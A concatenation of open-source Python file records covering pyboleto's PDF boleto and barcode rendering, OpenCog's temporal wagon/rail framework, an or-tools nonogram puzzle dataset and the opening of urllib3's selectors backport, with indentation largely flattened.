self.width)
# Vertical Lines
self.pdfCanvas.setLineWidth(1)
self.__verticalLine(
self.width - (30 * mm),
(linhaInicial + 0) * self.heightLine,
3 * self.heightLine
)
self.__verticalLine(
self.width - (30 * mm) - (35 * mm),
(linhaInicial + 1) * self.heightLine,
2 * self.heightLine
)
self.__verticalLine(
self.width - (30 * mm) - (35 * mm) - (40 * mm),
(linhaInicial + 1) * self.heightLine,
2 * self.heightLine
)
# Head
self.pdfCanvas.setLineWidth(2)
self.__verticalLine(40 * mm,
(linhaInicial + 3) * self.heightLine,
self.heightLine)
self.__verticalLine(60 * mm,
(linhaInicial + 3) * self.heightLine,
self.heightLine)
if boletoDados.logo_image:
logo_image_path = self._load_image(boletoDados.logo_image)
self.pdfCanvas.drawImage(
logo_image_path,
0, (linhaInicial + 3) * self.heightLine + 3,
40 * mm,
self.heightLine,
preserveAspectRatio=True,
anchor='sw'
)
self.pdfCanvas.setFont('Helvetica-Bold', 18)
self.pdfCanvas.drawCentredString(
50 * mm,
(linhaInicial + 3) * self.heightLine + 3,
boletoDados.codigo_dv_banco
)
self.pdfCanvas.setFont('Helvetica-Bold', 11.5)
self.pdfCanvas.drawRightString(
self.width,
(linhaInicial + 3) * self.heightLine + 3,
'Recibo do Pagador'
)
# Titles
self.pdfCanvas.setFont('Helvetica', 6)
self.deltaTitle = self.heightLine - (6 + 1)
self.pdfCanvas.drawRightString(
self.width,
self.heightLine,
'Autenticação Mecânica'
)
self.pdfCanvas.drawString(
0,
(((linhaInicial + 2) * self.heightLine)) + self.deltaTitle,
'Beneficiário'
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.deltaTitle,
'CPF/CNPJ Beneficiário'
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) - (40 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.deltaTitle,
'Agência/Código do Beneficiário'
)
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.deltaTitle,
'Vencimento'
)
self.pdfCanvas.drawString(
0,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'Pagador')
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) - (40 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'Nosso Número')
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'N. do documento')
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'Data Documento'
)
self.pdfCanvas.drawString(
0,
(((linhaInicial + 0) * self.heightLine)) + self.deltaTitle,
'Endereço Beneficiário'
)
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 0) * self.heightLine)) + self.deltaTitle,
'Valor Documento'
)
self.pdfCanvas.drawString(
0,
(((linhaInicial + 0) * self.heightLine - 3 * cm)) +
self.deltaTitle,
'Demonstrativo'
)
# Values
self.pdfCanvas.setFont('Helvetica', 9)
heighFont = 9 + 1
self.pdfCanvas.drawString(
0 + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.space,
boletoDados.cedente
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) - (40 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.space,
boletoDados.agencia_conta_cedente
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.space,
boletoDados.cedente_documento
)
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 2) * self.heightLine)) + self.space,
boletoDados.data_vencimento.strftime('%d/%m/%Y')
)
# Take care of long field
sacado0 = unicode(boletoDados.sacado[0])
while(stringWidth(sacado0,
self.pdfCanvas._fontname,
self.pdfCanvas._fontsize) > 8.4 * cm):
#sacado0 = sacado0[:-2] + u'\u2026'
sacado0 = sacado0[:-4] + u'...'
self.pdfCanvas.drawString(
0 + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
sacado0
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) - (40 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
boletoDados.format_nosso_numero()
)
self.pdfCanvas.drawString(
self.width - (30 * mm) - (35 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
boletoDados.numero_documento
)
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
boletoDados.data_documento.strftime('%d/%m/%Y')
)
valorDocumento = self._formataValorParaExibir(
boletoDados.valor_documento
)
self.pdfCanvas.drawString(
0 + self.space,
(((linhaInicial + 0) * self.heightLine)) + self.space,
boletoDados.cedente_endereco
)
self.pdfCanvas.drawString(
self.width - (30 * mm) + self.space,
(((linhaInicial + 0) * self.heightLine)) + self.space,
valorDocumento
)
self.pdfCanvas.setFont('Courier', 9)
demonstrativo = boletoDados.demonstrativo[0:25]
for i in range(len(demonstrativo)):
self.pdfCanvas.drawString(
2 * self.space,
(-3 * cm + ((linhaInicial + 0) * self.heightLine)) -
(i * heighFont),
demonstrativo[i])
self.pdfCanvas.setFont('Helvetica', 9)
self.pdfCanvas.restoreState()
return (self.width, ((linhaInicial + 3) * self.heightLine))
def _drawHorizontalCorteLine(self, x, y, width):
self.pdfCanvas.saveState()
self.pdfCanvas.translate(x, y)
self.pdfCanvas.setLineWidth(1)
self.pdfCanvas.setDash(1, 2)
self.__horizontalLine(0, 0, width)
self.pdfCanvas.restoreState()
def _drawVerticalCorteLine(self, x, y, height):
self.pdfCanvas.saveState()
self.pdfCanvas.translate(x, y)
self.pdfCanvas.setLineWidth(1)
self.pdfCanvas.setDash(1, 2)
self.__verticalLine(0, 0, height)
self.pdfCanvas.restoreState()
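    # The "corte" (cut) lines drawn by the two helpers above are dashed
    # guides marking where the printed boleto should be detached.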
def _drawReciboCaixa(self, boletoDados, x, y):
"""Imprime o Recibo do Caixa
:param boletoDados: Objeto com os dados do boleto a ser preenchido.
Deve ser subclasse de :class:`pyboleto.data.BoletoData`
:type boletoDados: :class:`pyboleto.data.BoletoData`
"""
self.pdfCanvas.saveState()
self.pdfCanvas.translate(x, y)
        # Bottom-up: position 0,0 is at the lower-left corner
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
y = 1.5 * self.heightLine
self.pdfCanvas.drawRightString(
self.width,
(1.5 * self.heightLine) + self.deltaTitle - 1,
'Autenticação Mecânica / Ficha de Compensação'
)
        # First line after the barcode
y += self.heightLine
self.pdfCanvas.setLineWidth(2)
self.__horizontalLine(0, y, self.width)
y += self.heightLine
yy = y
self.pdfCanvas.drawString(0, y + self.deltaTitle, 'Pagador')
sacado = boletoDados.sacado
        # Thick line separating the payer ("Sacado") block
y += self.heightLine
self.pdfCanvas.setLineWidth(2)
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
for i in range(len(sacado)):
L = simpleSplit(sacado[i],'Helvetica',self.fontSizeValue,350)
yyy = y
for t in L:
self.pdfCanvas.drawString(
15 * mm,
(yyy - 10) - (i * self.deltaFont),
t
)
yyy -= self.pdfCanvas._leading
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
        # Payer document number (CPF/CNPJ)
self.pdfCanvas.drawString(self.width - (44 * mm), yy + self.deltaTitle, 'CPF/CNPJ')
sacado_documento = boletoDados.sacado_documento
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
self.pdfCanvas.drawString(self.width - (44 * mm), yy + self.deltaTitle - 13, sacado_documento)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
        # Vertical line bounding all the right-hand fields
self.pdfCanvas.setLineWidth(1)
self.__verticalLine(self.width - (45 * mm), y, 9 * self.heightLine)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(=) Valor cobrado'
)
        # Right-hand fields
y += self.heightLine
self.__horizontalLine(self.width - (45 * mm), y, 45 * mm)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(+) Outros acréscimos'
)
y += self.heightLine
self.__horizontalLine(self.width - (45 * mm), y, 45 * mm)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(+) Mora/Multa'
)
y += self.heightLine
self.__horizontalLine(self.width - (45 * mm), y, 45 * mm)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(-) Outras deduções'
)
y += self.heightLine
self.__horizontalLine(self.width - (45 * mm), y, 45 * mm)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(-) Descontos/Abatimentos'
)
self.pdfCanvas.drawString(
0,
y + self.deltaTitle,
'Instruções'
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
instrucoes = boletoDados.instrucoes
for i in range(len(instrucoes)):
self.pdfCanvas.drawString(
2 * self.space,
y - (i * self.deltaFont),
instrucoes[i]
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
        # Horizontal line; first field is "Uso do banco" (bank use)
y += self.heightLine
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.drawString(0, y + self.deltaTitle, 'Uso do banco')
self.__verticalLine((30) * mm, y, 2 * self.heightLine)
self.pdfCanvas.drawString(
(30 * mm) + self.space,
y + self.deltaTitle,
'Carteira'
)
self.__verticalLine((30 + 20) * mm, y, self.heightLine)
self.pdfCanvas.drawString(
((30 + 20) * mm) + self.space,
y + self.deltaTitle,
'Espécie'
)
self.__verticalLine(
(30 + 20 + 20) * mm,
y,
2 * self.heightLine
)
self.pdfCanvas.drawString(
((30 + 40) * mm) + self.space,
y + self.deltaTitle,
'Quantidade'
)
self.__verticalLine(
(30 + 20 + 20 + 20 + 20) * mm, y, 2 * self.heightLine)
self.pdfCanvas.drawString(
((30 + 40 + 40) * mm) + self.space, y + self.deltaTitle, 'Valor')
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'(=) Valor documento'
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
self.pdfCanvas.drawString(
(30 * mm) + self.space,
y + self.space,
boletoDados.carteira
)
self.pdfCanvas.drawString(
((30 + 20) * mm) + self.space,
y + self.space,
boletoDados.especie
)
self.pdfCanvas.drawString(
((30 + 20 + 20) * mm) + self.space,
y + self.space,
boletoDados.quantidade
)
valor = self._formataValorParaExibir(boletoDados.valor)
self.pdfCanvas.drawString(
((30 + 20 + 20 + 20 + 20) * mm) + self.space,
y + self.space,
valor
)
valorDocumento = self._formataValorParaExibir(
boletoDados.valor_documento
)
self.pdfCanvas.drawRightString(
self.width - 2 * self.space,
y + self.space,
valorDocumento
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
        # Horizontal line; first field is the document date
y += self.heightLine
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.drawString(
0,
y + self.deltaTitle,
'Data do documento'
)
self.pdfCanvas.drawString(
(30 * mm) + self.space,
y + self.deltaTitle,
'N. do documento'
)
self.pdfCanvas.drawString(
((30 + 40) * mm) + self.space,
y + self.deltaTitle,
'Espécie doc'
)
self.__verticalLine(
(30 + 20 + 20 + 20) * mm,
y,
self.heightLine
)
self.pdfCanvas.drawString(
((30 + 40 + 20) * mm) + self.space,
y + self.deltaTitle,
'Aceite'
)
self.pdfCanvas.drawString(
((30 + 40 + 40) * mm) + self.space,
y + self.deltaTitle,
'Data processamento'
)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'Nosso número'
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
self.pdfCanvas.drawString(
0,
y + self.space,
boletoDados.data_documento.strftime('%d/%m/%Y')
)
self.pdfCanvas.drawString(
(30 * mm) + self.space,
y + self.space,
boletoDados.numero_documento
)
self.pdfCanvas.drawString(
((30 + 40) * mm) + self.space,
y + self.space,
boletoDados.especie_documento
)
self.pdfCanvas.drawString(
((30 + 40 + 20) * mm) + self.space,
y + self.space,
boletoDados.aceite
)
self.pdfCanvas.drawString(
((30 + 40 + 40) * mm) + self.space,
y + self.space,
boletoDados.data_processamento.strftime('%d/%m/%Y')
)
self.pdfCanvas.drawRightString(
self.width - 2 * self.space,
y + self.space,
boletoDados.format_nosso_numero()
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
        # Horizontal line; first field is the beneficiary (cedente)
y += self.heightLine
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.drawString(0, y + self.deltaTitle, 'Beneficiário')
self.__verticalLine(
(30 + 20 + 20 + 20 + 20) * mm,
y,
self.heightLine
)
self.pdfCanvas.drawString(
((30 + 40 + 40) * mm) + self.space,
y + self.deltaTitle,
'CPF/CNPJ Beneficiário'
)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'Agência/Código do Beneficiário'
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
self.pdfCanvas.drawString(0, y + self.space, boletoDados.cedente)
self.pdfCanvas.drawString(
((30 + 40 + 40) * mm) + self.space,
y + self.space,
boletoDados.cedente_documento
)
self.pdfCanvas.drawRightString(
self.width - 2 * self.space,
y + self.space,
boletoDados.agencia_conta_cedente
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
        # Horizontal line; first field is the payment location
y += self.heightLine
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.drawString(
0,
y + self.deltaTitle,
'Local de pagamento'
)
self.pdfCanvas.drawString(
self.width - (45 * mm) + self.space,
y + self.deltaTitle,
'Vencimento'
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeValue)
self.pdfCanvas.drawString(
0,
y + self.space,
boletoDados.local_pagamento
)
self.pdfCanvas.drawRightString(
self.width - 2 * self.space,
y + self.space,
boletoDados.data_vencimento.strftime('%d/%m/%Y')
)
self.pdfCanvas.setFont('Helvetica', self.fontSizeTitle)
        # Thick line; first field is the bank logo
self.pdfCanvas.setLineWidth(3)
y += self.heightLine
self.__horizontalLine(0, y, self.width)
self.pdfCanvas.setLineWidth(2)
        self.__verticalLine(40 * mm, y, self.heightLine)  # Bank logo
        self.__verticalLine(60 * mm, y, self.heightLine)  # Bank number
if boletoDados.logo_image:
logo_image_path = self._load_image(boletoDados.logo_image)
self.pdfCanvas.drawImage(
logo_image_path,
0,
y + self.space + 1,
40 * mm,
self.heightLine,
preserveAspectRatio=True,
anchor='sw'
)
self.pdfCanvas.setFont('Helvetica-Bold', 18)
self.pdfCanvas.drawCentredString(
50 * mm,
y + 2 * self.space,
boletoDados.codigo_dv_banco
)
self.pdfCanvas.setFont('Helvetica-Bold', 11.5)
self.pdfCanvas.drawRightString(
self.width,
y + 2 * self.space,
boletoDados.linha_digitavel
)
        # Barcode
self._codigoBarraI25(boletoDados.barcode, 2 * self.space, 0)
self.pdfCanvas.restoreState()
return self.width, (y + self.heightLine)
    def drawBoletoCarneDuplo(self, boletoDados1, boletoDados2=None):
        """Prints a carnê-style sheet with two boletos per page.
        :param boletoDados1: Object with the data of the boleto to be
            filled in. Must be a subclass of
            :class:`pyboleto.data.BoletoData`
        :param boletoDados2: Object with the data of the boleto to be
            filled in. Must be a subclass of
            :class:`pyboleto.data.BoletoData`
        :type boletoDados1: :class:`pyboleto.data.BoletoData`
        :type boletoDados2: :class:`pyboleto.data.BoletoData`
        """
y = 5 * mm
d = self.drawBoletoCarne(boletoDados1, y)
y += d[1] + 6 * mm
#self._drawHorizontalCorteLine(0, y, d[0])
y += 7 * mm
if boletoDados2:
self.drawBoletoCarne(boletoDados2, y)
    def drawBoletoCarne(self, boletoDados, y):
        """Prints a single one of the carnê's boletos.
        This function should not be called directly; use
        drawBoletoCarneDuplo instead.
        :param boletoDados: Object with the data of the boleto to be
            filled in. Must be a subclass of
            :class:`pyboleto.data.BoletoData`
        :type boletoDados: :class:`pyboleto.data.BoletoData`
        """
x = 15 * mm
d = self._drawReciboSacadoCanhoto(boletoDados, x, y)
x += d[0] + 8 * mm
self._drawVerticalCorteLine(x, y, d[1])
x += 8 * mm
d = self._drawReciboCaixa(boletoDados, x, y)
x += d[0]
return x, d[1]
    def drawBoleto(self, boletoDados):
        """Prints a conventional boleto.
        You can call this method several times to create a file with
        several pages, one per boleto.
        :param boletoDados: Object with the data of the boleto to be
            filled in. Must be a subclass of
            :class:`pyboleto.data.BoletoData`
        :type boletoDados: :class:`pyboleto.data.BoletoData`
        """
        x = 9 * mm  # left margin
        y = 10 * mm  # bottom margin
self._drawHorizontalCorteLine(x, y, self.width)
        y += 4 * mm  # gap between the cut line and the barcode
d = self._drawReciboCaixa(boletoDados, x, y)
        y += d[1] + (12 * mm)  # gap between the cashier's receipt and the cut line
self._drawHorizontalCorteLine(x, y, self.width)
y += 20 * mm
d = self._drawReciboSacado(boletoDados, x, y)
y += d[1]
return (self.width, y)
    def nextPage(self):
        """Forces the start of a new page"""
self.pdfCanvas.showPage()
    def save(self):
        """Finishes the boleto and builds the file"""
self.pdfCanvas.save()
def __horizontalLine(self, x, y, width):
self.pdfCanvas.line(x, y, x + width, y)
    def __verticalLine(self, x, y, height):
        self.pdfCanvas.line(x, y, x, y + height)
def __centreText(self, x, y, text):
self.pdfCanvas.drawCentredString(self.refX + x, self.refY + y, text)
def __rightText(self, x, y, text):
self.pdfCanvas.drawRightString(self.refX + x, self.refY + y, text)
    def _formataValorParaExibir(self, nfloat):
        # Despite the parameter name, the value arrives here as a string
        # (e.g. '123.45'); only the decimal separator is swapped for display.
        if nfloat:
            txt = nfloat.replace('.', ',')
        else:
            txt = ""
        return txt
    def _codigoBarraI25(self, num, x, y):
        """Prints a barcode optimized for boletos
        The barcode is optimized so that its length is always the 103mm
        stipulated by FEBRABAN.
        """
# http://en.wikipedia.org/wiki/Interleaved_2_of_5
altura = 13 * mm
comprimento = 103 * mm
        tracoFino = 0.254320987654 * mm  # Approximate correct size
bc = I2of5(num,
barWidth=tracoFino,
ratio=3,
barHeight=altura,
bearers=0,
quiet=0,
checksum=0)
        # Recompute tracoFino so that the barcode comes out at the
        # correct length
tracoFino = (tracoFino * comprimento) / bc.width
bc.__init__(num, barWidth=tracoFino)
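        # Worked example (illustrative, not from the original source): if the
        # first render spans 110 mm with tracoFino = 0.2543 mm, the rescale
        # above gives 0.2543 * 103 / 110 ~= 0.2381 mm, so the re-initialised
        # barcode spans exactly the 103 mm required by FEBRABAN.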
bc.drawOn(self.pdfCanvas, x, y)
| bsd-3-clause |
yantrabuddhi/opencog | opencog/python/spatiotemporal/temporal_events/composition/railway_framework.py | 34 | 8054 | from itertools import chain
from spatiotemporal.temporal_events.composition.emperical_distribution import overlaps
from spatiotemporal.temporal_events.util import Dijkstra
from utility.functions import almost_equals
__author__ = 'keyvan'
EPSILON = 1e-12
class Wagon(object):
def __init__(self, a, b):
self._a = float(a)
self.length = float(b - a)
self.bound_wagons = set()
self._parent = None
self.heads = []
self.tails = []
self.is_moving = False
@property
def parent(self):
return self._parent
@property
def is_root(self):
return self._parent is None
@property
def a(self):
return self._a
@property
def b(self):
return self._a + self.length
@property
def root(self):
wagon = self
while not wagon.is_root:
# print wagon.name
wagon = wagon._parent
return wagon
@property
def bounds(self):
return self.a, self.b
def bind(self, other):
root = self.root
root_other = other.root
if root_other is root:
return
root.bound_wagons.add(root_other)
for wagon in root_other.bound_wagons:
root.bound_wagons.add(wagon)
wagon._parent = root
root_other.bound_wagons = set()
root_other._parent = root
def move_to(self, a, b=None):
if b is None:
b = a + self.length
root = self.root
scale = (b - a) / self.length
bias = a - scale * self.a
if not (scale == 1.0 and bias == 0.0):
root.transform(scale, bias)
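        # e.g. move_to(0, 5) on a root wagon spanning [0, 10] gives
        # scale = 0.5 and bias = 0, so transform() maps every point x of
        # the bound tree to 0.5 * x.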
def find_move_cover_areas(self, a, b):
return (min(self.b, b), max(self.b, b)), (min(self.a, a), max(self.a, a))
def _move_heads_and_tails(self, a, b):
head_bounds, tail_bounds = self.find_move_cover_areas(a, b)
for head in self.heads:
if overlaps(head.bounds, head_bounds):
head.move_to(b, b + head.length)
for tail in self.tails:
if overlaps(tail.bounds, tail_bounds):
tail.move_to(a - tail.length, a)
def _move_to(self, a, b):
self._move_heads_and_tails(a, b)
self._a, self.length = a, b - a
def transform(self, scale, bias):
if self.is_moving:
return
self.is_moving = True
transform_start = self.a * scale + bias
transform_end = self.b * scale + bias
for wagon in self.bound_wagons:
wagon_a = wagon.a * scale + bias
wagon_b = wagon.b * scale + bias
wagon._move_to(wagon_a, wagon_b)
self._move_heads_and_tails(transform_start, transform_end)
self._a, self.length = transform_start, transform_end - transform_start
self.is_moving = False
def __str__(self, indent=0):
children = indent * ' ' + repr(self) + '\n'
for wagon in self.bound_wagons:
children += (indent + 1) * ' ' + wagon.__str__(indent + 1)
return children
def __repr__(self):
return 'Wagon(a: {0}, b: {1})'.format(self.a, self.b)
class Rail(list):
def __init__(self, iterable=None):
wagons = None
if iterable is not None:
for wagon in iterable:
if wagons is None:
wagons = [wagon]
previous_wagon = wagon
continue
previous_wagon.heads.append(wagon)
wagons.append(wagon)
wagon.tails.append(previous_wagon)
previous_wagon = wagon
list.__init__(self, wagons)
def append(self, wagon):
list.append(self, wagon)
wagon.tails.append(list.__getitem__(self, -2))
list.__getitem__(self, -2).heads.append(wagon)
def insert(self, index, wagon):
if index < 0:
raise NotImplementedError
list.insert(self, index, wagon)
if index > 0:
wagon.tails.append(list.__getitem__(self, index - 1))
list.__getitem__(self, index - 1).heads.append(wagon)
if index + 1 < len(self):
list.__getitem__(self, index - 1).heads.remove(list.__getitem__(self, index + 1))
if index < len(self):
wagon.heads.append(list.__getitem__(self, index + 1))
list.__getitem__(self, index + 1).tails.append(wagon)
if index - 1 >= 0:
list.__getitem__(self, index + 1).tails.remove(list.__getitem__(self, index - 1))
class RailwaySystem(object):
def __init__(self):
self.rails = {}
self.memo = []
self.dag = {}
def add_rail(self, rail_key):
self.memo.append(('add_rail', [rail_key]))
wagon_1 = Wagon(0, 10)
wagon_2 = Wagon(10, 20)
wagon_1.name = rail_key + '0'
wagon_2.name = rail_key + '1'
self.rails[rail_key] = Rail([wagon_1, wagon_2])
self.dag[wagon_1] = {wagon_2: 1}
self.dag[wagon_2] = {}
def move_wagon(self, rail_key, wagon_index, a, b):
self.memo.append(('move_wagon', (rail_key, wagon_index, a, b)))
self.rails[rail_key][wagon_index].move_to(a, b)
def bind_wagons_before_horizontal(self, rail_1_key, wagon_1_index, rail_2_key, wagon_2_index):
self.memo.append(('bind_wagons_before_horizontal', (rail_1_key, wagon_1_index, rail_2_key, wagon_2_index)))
wagon_1 = self.rails[rail_1_key][wagon_1_index]
wagon_2 = self.rails[rail_2_key][wagon_2_index]
if wagon_1.b > wagon_2.a:
wagon_2.move_to(wagon_1.b)
wagon_2.tails.append(wagon_1)
wagon_1.heads.append(wagon_2)
self.dag[wagon_1][wagon_2] = 1
def bind_wagons_after_horizontal(self, rail_1_key, wagon_1_index, rail_2_key, wagon_2_index):
self.bind_wagons_before_horizontal(rail_2_key, wagon_2_index, rail_1_key, wagon_1_index)
def bind_wagons_vertical(self, rail_1_key, wagon_1_index, rail_2_key, wagon_2_index):
wagon_1 = self.rails[rail_1_key][wagon_1_index]
wagon_2 = self.rails[rail_2_key][wagon_2_index]
self.memo.append(('bind_wagons_vertical', (rail_1_key, wagon_1_index, rail_2_key, wagon_2_index)))
wagon_2.bind(wagon_1)
equals_a = almost_equals(wagon_1.a, wagon_2.a, EPSILON)
equals_b = almost_equals(wagon_1.b, wagon_2.b, EPSILON)
if (wagon_1.a < wagon_2.a or equals_a) and (wagon_1.b < wagon_2.b or equals_b):
self.dag[wagon_1][wagon_2] = 1
if (wagon_1.a > wagon_2.a or equals_a) and (wagon_1.b > wagon_2.b or equals_b):
self.dag[wagon_2][wagon_1] = 1
def move_and_bind_vertical(self, rail_1_key, wagon_1_index, rail_2_key, wagon_2_index, a, b):
self.move_wagon(rail_1_key, wagon_1_index, a, b)
self.bind_wagons_vertical(rail_1_key, wagon_1_index, rail_2_key, wagon_2_index)
def are_in_same_vertical_tree(self, wagon_1, wagon_2):
return wagon_1.root is wagon_2.root
def are_in_same_horizontal_tree(self, wagon_1, wagon_2):
start = wagon_1
end = wagon_2
dijkstra_1 = Dijkstra(self.dag, start, end)
dijkstra_2 = Dijkstra(self.dag, end, start)
return end in dijkstra_1[0] or start in dijkstra_2[0]
def compress(self):
for rail_key, rail in self.rails.items():
wagon_tail = rail[0]
wagon_head = rail[-1]
self.move_wagon(rail_key, 0, wagon_head.a - wagon_tail.length, wagon_head.a)
def __getitem__(self, rail_key):
return self.rails[rail_key]
def __str__(self):
result = ''
for key, rail in self.rails.items():
result += str(key) + ': ' + str(rail) + '\n'
return result
def __deepcopy__(self, memo):
copy = RailwaySystem()
for action in self.memo:
copy.__getattribute__(action[0])(*action[1])
return copy
def __repr__(self):
return str(self)
def __iter__(self):
return chain(*self.rails.values())
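# Minimal usage sketch (added for illustration; not part of the original
# module), assuming the imports at the top of this file resolve.
if __name__ == '__main__':
    rails = RailwaySystem()
    rails.add_rail('A')
    rails.add_rail('B')
    # Move wagon 0 of rail 'A' onto [0, 5], then glue it vertically to
    # wagon 0 of rail 'B'; vertically bound wagons move and scale together.
    rails.move_and_bind_vertical('A', 0, 'B', 0, 0, 5)
    print rails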
| agpl-3.0 |
petesburgh/or-tools | examples/python/data/nonogram_regular/nonogram_p200.py | 74 | 1810 | # Copyright 2010 Hakan Kjellerstrand [email protected]
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Nonogram problem from Gecode: P200
# http://www.gecode.org/gecode-doc-latest/classNonogram.html
#
rows = 25
row_rule_len = 7
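# Each rule is left-padded with zeros up to the fixed rule length; e.g.
# [0,0,0,0,2,2,3] encodes the clue "2 2 3" (the run lengths of filled
# cells, in order).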
row_rules = [
[0,0,0,0,2,2,3],
[0,0,4,1,1,1,4],
[0,0,4,1,2,1,1],
[4,1,1,1,1,1,1],
[0,2,1,1,2,3,5],
[0,1,1,1,1,2,1],
[0,0,3,1,5,1,2],
[0,3,2,2,1,2,2],
[2,1,4,1,1,1,1],
[0,2,2,1,2,1,2],
[0,1,1,1,3,2,3],
[0,0,1,1,2,7,3],
[0,0,1,2,2,1,5],
[0,0,3,2,2,1,2],
[0,0,0,3,2,1,2],
[0,0,0,0,5,1,2],
[0,0,0,2,2,1,2],
[0,0,0,4,2,1,2],
[0,0,0,6,2,3,2],
[0,0,0,7,4,3,2],
[0,0,0,0,7,4,4],
[0,0,0,0,7,1,4],
[0,0,0,0,6,1,4],
[0,0,0,0,4,2,2],
[0,0,0,0,0,2,1]
]
cols = 25
col_rule_len = 6
col_rules = [
[0,0,1,1,2,2],
[0,0,0,5,5,7],
[0,0,5,2,2,9],
[0,0,3,2,3,9],
[0,1,1,3,2,7],
[0,0,0,3,1,5],
[0,7,1,1,1,3],
[1,2,1,1,2,1],
[0,0,0,4,2,4],
[0,0,1,2,2,2],
[0,0,0,4,6,2],
[0,0,1,2,2,1],
[0,0,3,3,2,1],
[0,0,0,4,1,15],
[1,1,1,3,1,1],
[2,1,1,2,2,3],
[0,0,1,4,4,1],
[0,0,1,4,3,2],
[0,0,1,1,2,2],
[0,7,2,3,1,1],
[0,2,1,1,1,5],
[0,0,0,1,2,5],
[0,0,1,1,1,3],
[0,0,0,4,2,1],
[0,0,0,0,0,3]
]
| apache-2.0 |
zvezdan/pip | src/pip/_vendor/urllib3/util/selectors.py | 138 | 21147 | # Backport of selectors.py from Python 3.5+ to support Python < 3.4
# Also has the behavior specified in PEP 475 which is to retry syscalls
# in the case of an EINTR error. This module is required because selectors34
# does not follow this behavior and instead returns that no file descriptor
# events have occurred rather than retry the syscall. The decision to drop
# support for select.devpoll is made to maintain 100% test coverage.
import errno
import math
import select
import socket
import sys
import time
from collections import namedtuple, Mapping
try:
monotonic = time.monotonic
except (AttributeError, ImportError):  # Python < 3.3
monotonic = time.time
EVENT_READ = (1 << 0)
EVENT_WRITE = (1 << 1)
HAS_SELECT = True # Variable that shows whether the platform has a selector.
_SYSCALL_SENTINEL = object() # Sentinel in case a system call returns None.
_DEFAULT_SELECTOR = None
class SelectorError(Exception):
def __init__(self, errcode):
super(SelectorError, self).__init__()
self.errno = errcode
def __repr__(self):
return "<SelectorError errno={0}>".format(self.errno)
def __str__(self):
return self.__repr__()
def _fileobj_to_fd(fileobj):
""" Return a file descriptor from a file object. If
given an integer will simply return that integer back. """
if isinstance(fileobj, int):
fd = fileobj
else:
try:
fd = int(fileobj.fileno())
except (AttributeError, TypeError, ValueError):
raise ValueError("Invalid file object: {0!r}".format(fileobj))
if fd < 0:
raise ValueError("Invalid file descriptor: {0}".format(fd))
return fd
# Determine which function to use to wrap system calls because Python 3.5+
# already handles the case when system calls are interrupted.
if sys.version_info >= (3, 5):
def _syscall_wrapper(func, _, *args, **kwargs):
""" This is the short-circuit version of the below logic
because in Python 3.5+ all system calls automatically restart
and recalculate their timeouts. """
try:
return func(*args, **kwargs)
except (OSError, IOError, select.error) as e:
errcode = None
if hasattr(e, "errno"):
errcode = e.errno
raise SelectorError(errcode)
else:
